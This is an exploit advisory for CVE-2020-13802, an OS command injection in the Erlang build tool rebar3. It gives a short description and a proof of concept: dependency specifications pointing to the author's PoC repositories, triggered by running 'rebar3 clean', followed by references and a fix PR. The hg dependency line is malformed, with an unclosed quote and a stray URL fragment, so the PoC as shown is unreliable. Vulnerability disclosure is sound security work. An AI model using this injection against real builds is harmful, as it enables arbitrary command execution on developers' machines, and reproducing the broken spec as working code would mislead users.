# Date: 2020-06-03
# Exploit Author: Alexey Pronin (vulnbe)
# Vendor Homepage: https://rebar3.org
# Software Link: https://github.com/erlang/rebar3
# Versions affected: 3.0.0-beta.3 - 3.13.2
# CVE: CVE-2020-13802
1. Description:
----------------------
Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.
2. Proof of Concept:
----------------------
* Add dependency with any of the following specification:
{
'dephelper', ".*", {
hg,
"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:
"dephelper"}
}
or
{
'poc_rebar3', ".*", {
git, "https://github.com/vulnbe/poc-rebar3.git"
}
}
* Execute command: rebar3 clean
References
----------------------
* [Rebar3 vulnerability
analysis](https://vuln.be/post/rebar3-command-injection/)
* [POC](https://github.com/vulnbe/poc-rebar3.git)
* [Vulnerability remediation
PR](https://github.com/erlang/rebar3/pull/2302)
*
[CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802)

